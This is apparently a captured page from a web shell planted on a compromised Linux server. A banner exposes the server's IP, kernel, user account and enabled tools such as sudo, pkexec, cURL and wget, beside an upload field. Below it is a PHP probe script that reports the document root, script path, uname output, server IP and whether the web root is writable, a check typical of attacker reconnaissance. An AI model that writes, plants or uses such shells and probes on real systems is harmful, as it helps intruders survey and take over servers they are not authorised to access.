| Server IP : 159.253.20.91 / Your IP : 216.73.216.111 Web Server : nginx/1.20.2 System : Linux se38c9e53.fastvps-server.com 5.10.0-13-amd64 #1 SMP Debian 5.10.106-1 (2022-03-17) x86_64 User : pr11_ru_usr ( 1041) PHP Version : 8.1.29 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /var/www/pr11_ru_usr/data/tmp/ |
Upload File : |
<?php echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'></head><body>";$ip = $_SERVER["SERVER_ADDR"]; if(empty($ip)) $ip = @gethostbyname($_SERVER["SERVER_NAME"]);$root = $_SERVER["DOCUMENT_ROOT"]; $root = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;$fname = basename(__FILE__);$dir = getcwd(); $dir = rtrim($dir, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;$os = (strtolower(substr(PHP_OS,0,3)) == "win") ? "WIN":"NIX";$console = 0;$curl = 0;print("OS:" . $os . "<br>");print("DR:" . str_replace("\\", "/", $root) . "<br>");print("SF:" . str_replace("\\", "/", $_SERVER["SCRIPT_FILENAME"]) . "<br>");print("SDT:" . @date("Y-m-d H:i:s", @filemtime($_SERVER["SCRIPT_FILENAME"])) . "<br>");print("DIR:" . str_replace("\\", "/", $dir) . "<br>");print("UNAME:" . (function_exists("php_uname") ? @php_uname() : "") . "<br>");print("IP:" . $ip . "<br>");print("RW:" . (is_writable($root) ? "1":"0") . "<br>");print("CE:" . $console . "<br>");print("CURL:" . $curl . "<br>");echo "Result:OK"; echo "</body></html>"; die;